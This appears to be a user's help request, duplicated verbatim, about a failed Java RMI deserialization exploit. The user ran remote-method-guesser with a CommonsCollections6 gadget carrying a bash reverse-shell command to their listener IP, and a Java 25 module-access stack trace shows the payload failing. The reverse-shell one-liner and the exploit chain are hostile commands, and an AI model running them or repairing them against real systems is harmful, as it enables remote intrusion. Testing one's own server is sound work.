Hello, my local server has been found vulnerable to:
[+] RMI registry JEP290 bypass enumeration:
[+]
[+] - Caught IllegalArgumentException after sending An Trinh gadget.
[+] Vulnerability Status: Vulnerable
When i run;
java -jar rmg-5.1.0-jar-with-dependencies.jar listen my-listener-ip 8099 CommonsCollections6 'bash -i >& /dev/tcp/my-listener-ip/8100 0>&1'
I receive in my rmg listener on port 8099:
Have connection from /192.168.37.31:43322
Reading message...
Is DGC call for [[0:0:0, 123]]
Sending return with payload for obj [0:0:0, 2]
java.lang.reflect.InaccessibleObjectException: Unable to make field private java.lang.String javax.management.BadAttributeValueExpException.val accessible: module java.management does not "opens javax.management" to unnamed module @67b6d4ae
at java.base/java.lang.reflect.AccessibleObject.throwInaccessibleObjectException(AccessibleObject.java:353)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:329)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:277)
at java.base/java.lang.reflect.Field.checkCanSetAccessible(Field.java:179)
at java.base/java.lang.reflect.Field.setAccessible(Field.java:173)
at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:26)
at ysoserial.payloads.util.Reflections.getField(Reflections.java:34)
at ysoserial.payloads.util.Reflections.setFieldValue(Reflections.java:44)
at ysoserial.exploit.JRMPListener.doCall(JRMPListener.java:284)
at ysoserial.exploit.JRMPListener.doMessage(JRMPListener.java:224)
at ysoserial.exploit.JRMPListener.run(JRMPListener.java:171)
at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:104)
at java.base/java.lang.reflect.Method.invoke(Method.java:565)
at eu.tneitzel.rmg.utils.YsoIntegration.createJRMPListener(YsoIntegration.java:181)
at eu.tneitzel.rmg.operations.Dispatcher.dispatchListen(Dispatcher.java:367)
at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:104)
at java.base/java.lang.reflect.Method.invoke(Method.java:565)
at eu.tneitzel.rmg.operations.Operation.invoke(Operation.java:385)
at eu.tneitzel.rmg.Starter.main(Starter.java:41)
Closing connection
Also because of the error above, no reverse shell received from netcat listener on port 8100.
I am running the following java version;
java --version
openjdk 25.0.1 2025-10-21
OpenJDK Runtime Environment (build 25.0.1+8-Ubuntu-124.04)
OpenJDK 64-Bit Server VM (build 25.0.1+8-Ubuntu-124.04, mixed mode, sharing)
Any help would be appreciated also let me know if you need more information.
Hello, my local server has been found vulnerable to:
[+] RMI registry JEP290 bypass enumeration:
[+]
[+] - Caught IllegalArgumentException after sending An Trinh gadget.
[+] Vulnerability Status: Vulnerable
When i run;
java -jar rmg-5.1.0-jar-with-dependencies.jar listen my-listener-ip 8099 CommonsCollections6 'bash -i >& /dev/tcp/my-listener-ip/8100 0>&1'
I receive in my rmg listener on port 8099:
Have connection from /192.168.37.31:43322
Reading message...
Is DGC call for [[0:0:0, 123]]
Sending return with payload for obj [0:0:0, 2]
java.lang.reflect.InaccessibleObjectException: Unable to make field private java.lang.String javax.management.BadAttributeValueExpException.val accessible: module java.management does not "opens javax.management" to unnamed module @67b6d4ae
at java.base/java.lang.reflect.AccessibleObject.throwInaccessibleObjectException(AccessibleObject.java:353)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:329)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:277)
at java.base/java.lang.reflect.Field.checkCanSetAccessible(Field.java:179)
at java.base/java.lang.reflect.Field.setAccessible(Field.java:173)
at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:26)
at ysoserial.payloads.util.Reflections.getField(Reflections.java:34)
at ysoserial.payloads.util.Reflections.setFieldValue(Reflections.java:44)
at ysoserial.exploit.JRMPListener.doCall(JRMPListener.java:284)
at ysoserial.exploit.JRMPListener.doMessage(JRMPListener.java:224)
at ysoserial.exploit.JRMPListener.run(JRMPListener.java:171)
at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:104)
at java.base/java.lang.reflect.Method.invoke(Method.java:565)
at eu.tneitzel.rmg.utils.YsoIntegration.createJRMPListener(YsoIntegration.java:181)
at eu.tneitzel.rmg.operations.Dispatcher.dispatchListen(Dispatcher.java:367)
at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:104)
at java.base/java.lang.reflect.Method.invoke(Method.java:565)
at eu.tneitzel.rmg.operations.Operation.invoke(Operation.java:385)
at eu.tneitzel.rmg.Starter.main(Starter.java:41)
Closing connection
Also because of the error above, no reverse shell received from netcat listener on port 8100.
I am running the following java version;
java --version
openjdk 25.0.1 2025-10-21
OpenJDK Runtime Environment (build 25.0.1+8-Ubuntu-124.04)
OpenJDK 64-Bit Server VM (build 25.0.1+8-Ubuntu-124.04, mixed mode, sharing)
Any help would be appreciated also let me know if you need more information.